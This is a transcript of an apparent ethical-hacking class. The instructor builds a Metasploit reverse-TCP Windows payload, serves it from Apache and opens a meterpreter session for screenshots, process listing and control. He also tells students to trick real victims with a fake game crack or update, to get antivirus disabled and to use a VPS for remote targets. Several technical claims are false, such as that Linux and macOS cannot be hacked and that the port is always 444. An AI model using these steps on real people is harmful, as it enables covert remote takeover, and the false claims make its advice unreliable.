Okay, great. So in today's session, we will be going to perform our system hacking module. In this one, we will be using Kali Linux as well as Windows. Okay, Windows will be our target. We will be hacking Windows user. What type of hacking we'll be performing? We will be gaining access, remote access to our Windows operating system. We will be tracking the tasks currently running in the Windows operating system, and we will be doing various kind of stuff in system hacking module. Okay, vulnerability access practicals, that will be carried out later, because the first one we need to cover out is system hacking, because it's very short module and we need to cover this one first. Okay, next we will be going to cover this vulnerability access practicals also, so don't worry about that. So how many of you first of all gone through the module system hacking? Anyone? Okay, great. So what we will be doing is, we will be using Metasploit. Metasploit MSF console. How many of you heard about this Metasploit MSF console? How many of you heard about Metasploit MSF console? Yes, so we will be going to use the Metasploit tool. In the Metasploit tool, we will be creating some payloads, and we will be creating a virus, a software, which will be a Windows executable software .exe file. Then we will be going to share the file to the Windows user from Kali Linux by creating an Apache server. Using the Apache server, the user can share the link of the tool. And whenever the victim or the target downloads the particular tool and run it for the first time, we will be getting access to this thing, Metasploit, the remote access of the particular Windows operating system. So today we will be going to perform this practical only. Okay. So first of all, let us open our tool module, our system hacking module. Can we do it parallelly? No, it's not possible to do parallelly. First, you need to focus on the practicals I am going to perform. After that, you can watch the recording session and can do it yourself also. Right now, you need to focus here actually. So we also have this thing also. In system hacking, a topic is there, which is password cracking. In this password cracking, we will be also cracking password using John the Ripper. John the Ripper is a password cracking tool using which we can decrypt passwords, which is encrypted in Windows operating system or whatever passwords. Okay, so we can do this using John the Ripper. Okay, so we will be carrying out this one after the first practical, which is system hacking. After that, we will be doing this one today only. So let us go to this one. Okay, yeah. So this one is the topic. Exploiting client-side vulnerabilities and establishing a VNC connection. Okay, VNC, what is VNC? Well, VNC is a virtual network connection where we can enable remote access to the target's computer or system. We can access target's laptop, computer or server easily. Okay, with the help of a vulnerability which is available in each and every Windows operating system. Okay, but the first thing you need to remember is you cannot bypass antivirus. Okay, you need, if you want to make this thing work, you need to disable the antivirus somehow. If we take example of real time, suppose you are going to do it in real time, in that case, if you want your target to install the software, then you need to make some some kind of story that you need to install this tool, this is the latest update of this tool, a crack of a latest game. Okay, so you just need to make some stories and then you can easily install the particular software in the target system. If the antivirus is active, it will be automatically deleted. It won't work. Okay. Is it understood to everyone? Let me know in the chat. Whenever we create a virus and whenever we want to install it in a target's computer, we need to deactivate the antivirus anyhow. If we don't activate the antivirus, deactivate the antivirus, it won't work. Okay. So in this class, we are going to do this one, create a VNC session, and we will be establishing a connection to the Windows operating system with our Kali Linux, okay, using Metasploit MSF console. Are we installing anything on target PC or use the, well, we will be creating a virus in Kali Linux. Okay, the virus will be a .exe software. Then we need the particular software to be installed on target's computer, because the software is an executable file. Okay, it won't do anything. Like the victim won't even know that the particular software is running in the background. Whenever the user double clicks or downloads, it will get automatically installed in the background, started working and started sending. It will be sending data back to our Metasploit, which is running in Kali Linux. So it's very easy. Okay. So we will be generating a virus, a malware in our Kali Linux. We will be sharing the particular software using the Apache server. And whenever the user downloads, the Windows user downloads the software, it will be installed and we will get the remote access of the Windows system in our Kali Linux. Okay, it's very easy. So lab environment is, you need Kali Linux as a virtual machine, Windows 10 as a running virtual machine. It's not necessary. I'm using my Windows system, this one only. And in the virtual, we will be using Kali Linux. Okay, a web browser and admin privileges. Web browser, we need to download the software, and admin privileges we need to run the tools, because without the sudo permission in Kali Linux, you won't be able to run the software. Okay. Now here comes the practical part. The first of all, we will be going to start with the Kali Linux, and then we will be going to take the help of Metasploit. Okay, Metasploit, we will be doing some MSF console activities, MSF Venom activities, and different sort of activities. Okay, and then we will be doing this one, creating a Apache server localhost. Localhost means either we can share it in the localhost, either we can share in the remote internet also. Okay, but I'm doing this thing in local area network. Okay, I'm having this one Windows operating system in the same laptop and Kali Linux also in the same laptop as a virtual machine. So we will be performing this activity on the same system. Even if you want, you can do in the remote systems also. Okay. So now we will be going to boot our Kali Linux machine in the VMware. Is it compulsory to perform hacking on Windows system? Well, Windows is the only thing which you can hack. Okay. You cannot hack Kali Linux. It's not possible to hack Kali Linux. The software which is built to hack a system cannot be hacked itself. Okay, so you can hack Windows operating system, Android operating system, and different sort of operating systems, but not Kali Linux. Operating systems which are built on Linux cannot be hacked. Okay, Mac OS also cannot be hacked. Parrot also cannot be hacked. So all these things are there. Apache server also on the same Windows host. No, Apache server we will be running in Kali Linux. Okay. But wherever we will be running the Metasploit, MSF Venom, MSF console, on that system only we need to run the Apache server, because our system will be is the key to the internet. Okay, the link to the internet, because we will be sharing the test, the exe file, the virus from our system. Okay, or we can just share the virus file through email or through pen drive, and just put, we just need to run the Metasploit in the Kali Linux. It will be running continuously, and whenever the victim installs the software, it will start sending the data. Okay, so we will be doing this thing. In this one, we need the IP address of Windows operating system also, because we need the IP of the host. Okay, so two things we need to do. First thing, we need to generate the soft this thing virus, and second thing, we need to assign it the IP address of a target machine. So you need this one also as the information. You need IP address of our target, of your target machine. Okay, so let us boot our this thing Kali Linux. Sorry, I was not, I didn't remember my password because I'm booting this system after week long as I was having some health issues. So, okay, now our machine is booted. So as you can see, I have already tested this software, test.txt we have generated. Let us delete this one. Okay, so let us try to first of all make this screen big. Okay, something. So everyone is able to see the screen of Kali Linux. Let me know in the live chat. Okay, great. So just give me 2 minutes, okay? Just give me 2 minutes so that I can set up the things. Okay, now let us start about terminal. First of all, we need to start the terminal, and then we need to do this thing. Okay, terminal is open now. Let me first of all note down the command. Yes, I will be doing the full screen. Kindly wait for a few moments. Let me first of all note down the command, or either or else we need to do this again and again, open this thing. So first of all, as I already told you, we need to use the Metasploit. In Metasploit, we need to use MSF Venom. MSF Venom is used to create the VNs, the virtual network connection, sorry, the virus, okay? The virus we will be creating and storing in our Kali Linux, and then we will be sharing the virus to our target. Whenever the target installs the software, we can get easy access to the target system. So this is a command. Okay, let me first of all note it down in my different system. MSF Venom. It's MSF Venom. Okay, MSF Venom is a command of Metasploit. Hyphen p, okay. Now hyphen p means we need to assign this one the type of payload we want to create, okay? So payload will be Windows Metaprater reverse TCP. Reverse TCP hacking we are going to do, okay? Thus, we are going to create a tunnel network which will be based on TCP, and based on that tunnel network we will be getting access to the particular target. So hyphen p Windows / Metaprater / reverse TCP. This is the name of the payload. Okay. Now --, platform. Which platform we want to have? Based on that only. This one. You will be getting a exe file, apk file, or whatever you can create. You can even assign Android platform, but for that you need to have a payload of Android also available in the market. Currently we have this default payload, which is Windows Metaprater reverse TCP. --, platform. We need to define the platform Windows can't see any. How many of you are dumb here? I already told you, I am noting down the command in my different system. So you don't focus and then you just type in the live chat, can't see anything, can't hear anything. First of all, be on time. After that, you can understand everything. Windows is there, then -a is there. -a, in this -a we need to define our architect. Okay, architect means like architecture is there, like Windows 86 is there, 64 is there, 32 is there. We'll be defining 86 here. Okay, -a 86, this one is the 86. Okay, then -f. Now what is the return we want, like the format? -f means the format. So -f is there. And after that, it is exe. So we need to get the exe file. Okay, we will be typing exe, and then after that, we need to define lhost and lport. Lhost means the local host. Okay, attacker machine IP address. Okay, attacker machine IP address means the IP address of your Kali Linux. Okay, suppose if you are creating your virus from your system, you need to define the IP address here. So lhost will be there. Lhost and then the IP address. After that, you need to define lport. In the L port, you need to define the port number. So the default port number will be 444. In this one, we will be creating a tunnel connection on this particular port number only. Then hyphen O means the output, where we want the output to be stored. So we want the output to be stored in root, desktop, and the name of the file, which is test.exe. So this is the thing, okay? Now let us do this thing. But let us type this command in our virtual machine. Let us create this one. Okay. First thing is msf venom hyphen p windows meterpreter reverse tcp platform, it's windows hyphen a 86 architect hyphen f the exe extension L host, we need to provide our IP address. So for that, let us find out the IP address. So our IP address is this is our IP address. You need to provide our IP address here. Then L port 444 hyphen output, where we want the output to be stored. So let us store in the root stop. The name will be test. Exe. And now before running the command, you need to make sure that sudo is attached in the beginning or else it won't work. Sudo. Now the entire command is ready. Now we need to run this command. Before that, let us move back to our PDF. Does L port varies every time like different systems? No, L port is same for every condition. It's 444. Okay, L port is same because we are doing the TCP reverse connection here. Okay, so the TCP connection only establish a secure tunnel over 444 port. P is not parameter. P means payload. The payload we are using is Windows Interpreter Reverse TCP. This is the name of the payload. How do we find out the port? I'm continuously telling this from last 15 minutes that port number is 444. You don't need to find any port number. Why are you not focusing on class? Port number doesn't change. Port number is static every time. 444. The IP address will be different. Okay. The IP address is the IP address of your system. Of your system means the Kali Linux or whatever system you are going to perform the practicals. From wherever you are going to use a MSF Venom, for that system you need the IP address, because a particular system will be creating the tunnel connection. Okay. Now let's go back to our this one. Okay. Okay, location we are giving wrong. What type of location do we need to provide? Okay, so you can see here our payload is now our virus is now generated. Okay, desktop, it's on desktop. Let us minimize this one. So here is our virus, test.exe. Now the second step is to share this file to our Windows target. How we will be doing this activity? Anyone, if you remember whatever I told, let me know how we will be going to share this file to our target. Okay, so if you are saying through email, drive, let me tell you all that we are sharing a virus. So virus cannot be transmitted using email or Google Drive. Okay. Google can easily detect that it's a virus. So we need to share this using a pen drive, using our own server. Okay, if you have your own server, you can do that. If you have your pen drive, you can do that, or through some different sort of methods also. Right now, we are going to create a local host Apache server. So right now, we are going to share through Apache server. Okay, so as I'm already having an Apache server in my laptop, okay, I just need to boot the Apache server and then just share the file. So how to do that? First of all, file we have generated, text.txt, we need to move it to the Apache server folder. So Apache server folder generally resides in bare www.html share folder. If you don't have this folder, just use the command mkdir. Okay, mkdir var www.html and share. Make this directory. Chmod will change the permission and then chown. And in this folder, whenever we create this folder, we need to move our .exe file to this one. Okay, so we just need to use the cp command and move the test.exe to our var www.html share for this one file. Okay, so the command will be cp location of our this one and in var www.html share, here we need to share the file. And then we need to start our Apache server. Let us do this one. Chmod and chown is used to change the mod of the file, readable, writable, executable. If you remember, I have told you this in the beginning of the course actually. What is the use of chmod and chown? So just try to focus on each and every class, as these are the common terms which I already told in the previous classes. Now we have the exe file. Now we need to move this file to our this thing Apache server root folder. Okay, so sudo cp home desktop test.exe, we need to move this to var www.html share. Okay, now it's moved to the particular folder. Now we need to start our Apache server. Service Apache to start. Okay, sorry, sudo service Apache to start. The service is started. Okay, now what is the IP address of our system? What was that? What sudo means? Sudo is a command which is used to perform actions forcefully. Okay, well, I'm not the root user of Kali Linux. That's why every time when I need to perform something which needs admin privileges, we need to use sudo commands. Okay, suppose you are using a command and you are not able to use the command. Okay, so in that case, you need to use sudo. Sudo means to perform this action forcefully. So anyhow, it will execute. Apache server is available in Kali Linux, or we need to install. Apache server is available by default in Kali Linux. You don't need to do anything. Just create directory where www.html share using mkdir command and just use this command service apache to start. It will automatically start. And now let us find what is the IP address. Okay, again let us check out our IP address. What was that? Yes, it's compulsory to run Apache server in Kali Linux. Okay, so let us go to IP address 192.168. Okay, this one is the IP address. The Apache server is running. Okay, this one is the Apache server of Kali Linux. Now let us browse the file where it was. So test.exe, I think. Okay, sorry, first of all, okay, the Apache server is currently running, okay? As we can see, Apache server is running. So the software is ready, the virus is ready, and the Apache server is ready. Now the second step we need to do is we need to start the poisoning. Starting the poisoning means we need to start our MSF console where we need to execute our payload. Without that, we cannot establish connection. We can download the software, but it won't work. Okay, we will not receive any connection. So in that case, we need to start our MSF console. So MSF console is the command. Let me write it down in my notepad. MSF console. So MSF console we will be using. After MSF console, use this command. Use multi-handler. Multi-handler is a type of connection which we will be creating. Use multi. Handler. After multi-handler, we need to set our payload. Okay, the payload we have created a software test.exe. Now we need to execute or set the payload. Whenever it is active, we can start our exploit. So set payload. The name of the payload: Windows Meter Creator. Reverse TCP. This is the payload. We will be executing it. Then we will be setting the L host. The L host of our Kali Linux. Set. L port 444. It will configure, and then after that we need to type start the exploit. So after typing the exploit will start. Okay. Now let us move back to our Kali Linux. So let us close this one. Okay. Clear out these all things. Sudo meta exploit. Sorry, what was it? MSF console. So you all can see it's starting now. Okay, now the MSF console is started. Okay, now what we need to do is we need to use multi handler. After that, we need to set the payload. Set payload Windows Meter Preter reverse TCP. Hit enter. Set L host. What was the IP address? 192.168. One three nine one three one. Set L port 444 and then exploit. So the TCP handler started on the following IP address. Now, right now we are not receiving any logs, which means there is no connection going on. So our victim is not currently having the software installed in his system. Now, let us go back to our Windows operating system and install the software. So go to this share folder. We have the script.txt installed here. Sorry, the either present here. Click on this. It will download. And then you can see your antivirus detected that it's a virus. Now let us deactivate our Windows Defender. So here we have disabled our antivirus. Now let us again download this. Now it's downloaded. Okay. Now click on the software. Okay. Let us see here if there anything. No, we have not received anything till now here. Okay. Whenever we install the software, it will start receiving the connection. Okay. Let us minimize this. More info or run anyway. Now it's running in the background and you can see we started receiving the connection here. Started reverse TCP handler on this one, sending stage this one is the IP address, meter repeater session one opened, and currently we are active with the Windows operating system. The IP address 192.168.139.1 is the IP address of our Windows operating system. Now we have the access of Windows operating system. Now we can do anything in this meter repeater connection. We can even take screenshots. We can even control the system remotely. We can see the tasks going on the current Windows operating system. Let us go back to our this one module. After having the connection, okay, now let us first of all find out the type system info. So for that we can type sys info. So we can see the system we are currently connected to is laptop, this one Windows 10 operating system, architecture 64, language work group, logged on users 2, meter repeater connection going on. So we can see the system info. Now let us do some different things. Now we will be creating a VNC session to capture the access of Windows 10. Okay, so we will be run VNC. Okay, So this type of thing is happening because we are using virtual machine. That's why we are getting the image of our this thing virtual machine one by one. Okay, let us terminate this one. You are able to see this one? Everyone, is it this one visible? So the remote connection is connected. Why it's showing like this? Because we are currently using VMware and it's showing VMware under VMware under VMware under VMware. That's why it's happening like this. If you're using some different system, it won't work like this one. Okay. Let's first of all close the connection. Or else it will. Okay, now it's closed. Let us try to do some screen. This one, screenshots. Okay, before screenshot, let us do this one. PS, processes running. So we can see here, these are the processes running in the laptop. Runtime broker, these are the processes currently running in my laptop, Windows, Chrome. Okay. These are the processes running in our target system. So PS is used for this one. Now let us find out the screenshot command. Screenshot. Let us store this one in home. Gosh. Desktop. Screenshot saved. Let us find out the screenshot. It's saved here. It's open here. Okay. So here is the screenshot. This one is a screenshot we have taken. Okay. So close this one. Could we stop one of those processes? Yes, we can stop any process. We just need to type stop and the process ID. This is the process ID. Okay. I hope this is the process ID. Just a second. Sorry. Yeah, this is the process ID. So you just need to pass this process ID following stop. It will stop the process ID. Stop PID, PID number, and it will stop the process. I hope it's clear to everyone. Any confusions here? Everyone? extract all images. Not getting your point. What do you mean by extracting images? All images. Please clarify this. No, you need to take screenshots one by one. It's not possible like that. You need to take screenshots one by one. Yes, you can also do the folders import also. We have different sort of commands for different sort of uses. You can even shut down the system, but we cannot perform this right now. If I shut down, my whole system will go offline and the class will end. Do you want to shut down my system? Everyone? Okay. So is there any confusion? Anyone? You can ask in the live chat. If you are having any confusion, please ask in the live chat. Today we did this practical, which was very important. Then in the next session, we will be moving to vulnerabilities, this one practicals and different sort of practicals also. Do we have GUI of Metasploit? Yes, we do have GUI of Metasploit, but this activity, the MSF console, MSF Venom, is only available in Kali Linux. Is this virus work for Android? No, it will not work for Android. This is a Windows payload, a Windows vulnerability we have exploited. Okay, this will not work in Android. For Android, you need to use different payload, like after hyphen P, whatever we passed the command is a payload, Windows, Metaflitter, reverse TCP. For Android, you need to use a different payload for Android. We are performing screenshot operation in the same way we can shut down. Yes, it's simple. Just pass the command, shut down. It will shut down. Commands are very easy. Screenshot, shut down, PID, PS, all these commands are available over the internet, you can see. If we have to install the exe in target system, well, right now here I'm using the local area connection. If you want to do this remotely or globally, you want a VPN, a server. On the particular server, install the Kali Linux. You will be having a static IP. Okay, right now we have dynamic IP. Whenever we shut down the system and restart, the IP address will change. Okay, so if you want to do it remotely or globally, you need a VPN. Sorry, VPS, virtual private server. Okay, and that server you need to install Kali Linux, and then you can install or work with the MSF console, MSF Venom. Just pass the IP address in lhost or your static IP address, and then you can easily perform those things. If you're using physical machine instead of VM, it's up to you. If you are having Kali Linux in your actual system, yes, you can do that. Virtual machine is just a software which we are using for running multiple operating systems in the same laptop. I cannot show you practicals on different victim computers because it's not this one is not legal, and I don't have the permissions also. So I have to show this one on my own system. Can you show us the MSF command again? Command is available here in the PDF file. You can just go through this one. System hacking module number 6. The commands are here. Here are the commands. To get image from target, is it required to new the image name? No, it's not required. You can just access the folders. You just need to access. You can access the folders, folder system in the victims of target's computer, and then you will be able to find out files names, folders names. So it's not an issue. Okay, so I hope it's clear to everyone. Let me know in the live chat, everyone. Okay, so that's all for today's practical session. Okay, we will be covering some few minutes of theory in the next session, and then we will move into our vulnerability practical session in the next class, okay, which will be on Friday and Saturday. PDFs are all already shared in the Telegram group. Just scroll the group to the top messages, and in the top, the zip folder is already shared. CEH-master folder is already there. The drive link is also shared. So everything is there. Okay, everyone, so I hope everything is clear. Now, yes, I will be also sharing the tools. Sorry for the delay because I was having some health issues. Due to that, I was not able to take classes. I was not able to share the tools. So I will be sharing everything today itself. Okay, so I will be sharing the recording of this session in the evening whenever it's uploaded. And that's all for today's session, and time we can leave the class, and let us meet again and on Friday's session. Okay, now we will do another tools for system hacking of the module. Now for system hacking, we will be using Kali Linux only, the Metasploit tool, MSF console, nothing else. Okay, everyone, thank you for your patience. Have a good day ahead, and you can leave the class right now.